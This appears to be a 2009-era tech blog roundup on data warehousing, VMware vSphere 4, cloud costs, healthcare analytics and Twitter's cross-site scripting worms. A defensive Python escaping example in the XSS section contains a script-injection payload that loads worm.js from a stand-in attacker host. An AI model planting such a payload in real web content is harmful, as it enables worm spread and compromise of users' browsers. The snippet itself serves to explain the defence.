Is building an enterprise data warehouse (EDW) the best path to business intelligence (BI)? It’s a perennially vexing question that — thanks to a couple of recent trends in BI and data warehousing (DW) — has taken on new life.
The value of the full-fledged EDW seems unassailable. Over the last half-decade, however, some of the biggest EDW champions have moderated their stances: they now acknowledge that alternatives exist and, under certain very special conditions, are even willing to admit they’re useful. The result is that although the EDW is still seen as the Holy Grail of data warehousing, departmental (and even enterprise) data marts are now countenanced as well.
Active EDW giant Teradata Inc. is the foremost case in point, but other players — including relative newcomer Hewlett-Packard Co. (HP), which entered the high-end DW segment through its acquisition of Knightsbridge Solutions and markets Neoview, a DW appliance-like offering — are staking out similar ground. (In addition to Neoview, HP also partners with both Microsoft Corp. and Oracle Corp. to market appliances in the 1 to 32 TB range.)
Interesting debate on TDWI.
The cloud computing space is heating up. VMware’s latest major update to its existing ESX Server is an addition to the portfolio of cloud computing software.
VMware on April 21 launched vSphere 4, a major update to its ESX Server hypervisor, declaring it to be the first operating system specifically engineered for cloud computing. It is the first major upgrade to the product since 2006.
vSphere 4 amounts to a rebuild of VMware’s core virtualization platform. Fundamentally, it combines virtual resources in the data center into one centrally managed pool of computing power. It will be made available in the second quarter of 2009, the company said.
vSphere 4’s second purpose is to facilitate delivery of IT infrastructure as a service to enterprises, so IT departments can build their own private cloud systems to provide business services internally for the company and for trusted partners, supply chain participants and other business associates.
From eWeek’s article.
The Small Business Intelligence Summit (SBIS) will kick off the first of a nationwide series of events in Dallas, Texas on Thursday, May 14, with intensive sessions to help small businesses succeed in the current challenging economy. The events will allow existing and developing companies to connect and collaborate on solutions that support their business in today’s environment and well into the future.
The events will feature expert speakers, including sessions with:
– Chuck Wilsker, president and CEO of the Telework Coalition and co-author of numerous articles, including “Unleashing the Hidden Productivity of Your Small Business. Unified Communications: A Key Component of Your
– Bob Burg, corporate speaker and author of “Endless Referrals: Network Your Everyday Contacts Into Sales”
– Christopher Justice, CEO of Sparksight, a small business-marketing
– Small and Mid-size Business experts from Avaya, a global leader in
From the Press Release. More from the official site – SBIS09.
From New York Times BITS Blog, a post on McKinsey’s recent study on Cloud Computing.
The McKinsey study, “Clearing the Air on Cloud Computing,” concludes that outsourcing a typical corporate data center to a cloud service would more than double the cost. Its study uses Amazon.com’s Web service offering as the price of outsourced cloud computing, since its service is the best-known and it publishes its costs. On that basis, according to McKinsey, the total cost of the data center functions would be $366 a month per unit of computing output, compared with $150 a month for the conventional data center.
“The industry has assumed the financial benefits of cloud computing and, in our view, that’s a faulty assumption,” said Will Forrest, a principal at McKinsey, who led the study.
Owning the hardware, McKinsey states, is actually cost-effective for most corporations when the depreciation write-offs for tax purposes are included. And the labor savings from moving to the cloud model have been greatly exaggerated, Mr. Forrest says. The care and feeding of a company’s software, regardless of where it’s hosted, and providing help to users both remain labor-intensive endeavors.
Clouds, Mr. Forrest notes, can make a lot of sense for small and medium-sized companies, typically with revenue of $500 million or less.
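Taking the article’s figures at face value, the claimed cost gap is easy to sketch. This is a minimal back-of-the-envelope calculation, assuming cost scales linearly with “units of computing output” — the function and variable names are illustrative, not from the study:

```python
# Per-unit monthly costs quoted from the McKinsey comparison above;
# linear scaling with output units is an illustrative assumption.
CLOUD_COST_PER_UNIT = 366    # USD/month, outsourced cloud (Amazon-priced)
INHOUSE_COST_PER_UNIT = 150  # USD/month, conventional data center

def monthly_cost(units, per_unit):
    """Total monthly cost, assuming cost scales linearly with output."""
    return units * per_unit

units = 100
cloud_total = monthly_cost(units, CLOUD_COST_PER_UNIT)      # 36600
inhouse_total = monthly_cost(units, INHOUSE_COST_PER_UNIT)  # 15000
premium = CLOUD_COST_PER_UNIT / INHOUSE_COST_PER_UNIT       # ~2.44x
print(f"cloud premium: {premium:.2f}x")
```

On these numbers the cloud option costs more than double, which is exactly the “faulty assumption” Forrest is pushing back on.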
Over at The Health Care Blog, Deb Bradley, Vice President, Client Solutions at Verisk Health in Waltham, Massachusetts, writes about some examples of next-generation healthcare analytics. Most of us who do analytics engineering as a part of our day jobs would agree that healthcare is one area where analytics should grow vastly. There is a lot of data that can be intelligently massaged to answer some of the most challenging health-related questions.
Medical claims, pharmacy claims, lab values, HRAs, genetic markers, biometrics – the abundance of data is having an immediate impact on how analytics shape healthcare. Next generation analytics are bringing attention to health and wellness rather than disease-specific guidelines, and generating novel approaches to value-based medicine and care management.
Traditionally, analytics, such as predictive modeling, have been used to identify individuals for chronic care management and to set rates. New predictive models, however, include financial and clinical algorithms, which allow healthcare organizations to implement advanced ways to identify, manage and measure risk across and within a population.
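To make the “identify risk within a population” idea concrete, here is a toy sketch of risk stratification as a weighted feature score. Everything below — the features, weights, and threshold — is invented for illustration; the real models the post describes combine clinical and financial algorithms far more rigorously than a weighted sum:

```python
# Toy risk-stratification sketch; all names and numbers are invented.
WEIGHTS = {
    "chronic_conditions": 2.0,   # count of chronic diagnoses
    "er_visits_last_year": 1.5,  # emergency room utilization
    "pharmacy_claims": 0.5,      # distinct prescriptions filled
}

def risk_score(member):
    """Weighted sum of a member's utilization features."""
    return sum(w * member.get(feature, 0) for feature, w in WEIGHTS.items())

members = [
    {"id": 1, "chronic_conditions": 3, "er_visits_last_year": 1, "pharmacy_claims": 2},
    {"id": 2, "chronic_conditions": 0, "er_visits_last_year": 0, "pharmacy_claims": 1},
]
# Members above the (arbitrary) threshold get flagged for care management.
high_risk = [m["id"] for m in members if risk_score(m) >= 8.0]
```

The point of the newer models is precisely that they replace hand-tuned scores like this with algorithms validated against clinical and financial outcomes.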
Cross-site scripting is becoming a common security vulnerability in online services. And Twitter, which allows 140 characters per tweet, wasn’t an exception.
The worms exploit a common vulnerability in Web applications called cross-site scripting, which allows someone to inject code into Web pages others are viewing.
In this instance, Twitter users who clicked on the name or image of anyone sending the worm messages would get infected and then send the message on to all that person’s followers. Anyone viewing an infected user’s profile would also get infected and pass the worm on.
While the attacks were mostly a nuisance, they could have been dangerous if spyware or other malware had been downloaded onto Twitter users’ computers, Cluley said.
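The standard defense against this class of attack is output escaping: any user-supplied value must be encoded before it is embedded in a page. A minimal sketch follows — the rendering function and payload URL are hypothetical, not Twitter’s actual code:

```python
import html

def render_display_name(user_supplied_name):
    """Escape user input before embedding it in HTML, so injected
    markup is rendered as inert text rather than executed."""
    return '<span class="name">' + html.escape(user_supplied_name) + '</span>'

# A worm-style payload hidden in a profile field (hypothetical URL).
payload = '<script src="http://evil.example/worm.js"></script>'
rendered = render_display_name(payload)
# The payload's angle brackets become &lt; and &gt;, so the browser
# displays the text instead of fetching and running the script.
```

The Twitter worms worked because profile fields like this reached other users’ pages without that encoding step.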
This classic data warehouse architecture (CDWA) has served us well the last twenty years. In fact, up to five years ago we had good reasons to use this architecture. The state of database, ETL, and reporting technology did not really allow us to develop something else. All the tools were aimed at supporting the CDWA. But the question right now is: twenty years later, is this still the right architecture? Is this the best possible architecture we can come up with, especially if we consider the new demands and requirements, and if we look at new technologies available in the market? My answer would be no! To me, we are slowly reaching the end of an era. An era where the CDWA was king. It is time for change. This article is the first in a series on the flaws of the CDWA and on an alternative architecture, one that fits the needs and wishes of most organizations for (hopefully) the next twenty years. Let’s start by describing some of the CDWA flaws.
The first flaw is related to the concept of operational business intelligence. More and more, organizations show interest in supporting operational business intelligence. What this means is that the reports that the decision makers use have to include more up-to-date data. Refreshing the source data once a day is not enough for those users. Decision makers who are quite close to the business processes especially need 100% up-to-date data. But how do you do this? You don’t have to be a technological wizard to understand that, if data has to be copied four or five times from one data storage layer to another, to get from the production databases to the reports, doing this in just a few seconds will become close to impossible. We have to simplify the architecture to be able to support operational business intelligence. The bottom line is that we have to remove data storage layers and minimize the number of copy steps.
Great read from BEye Network. Part 1 and Part 2.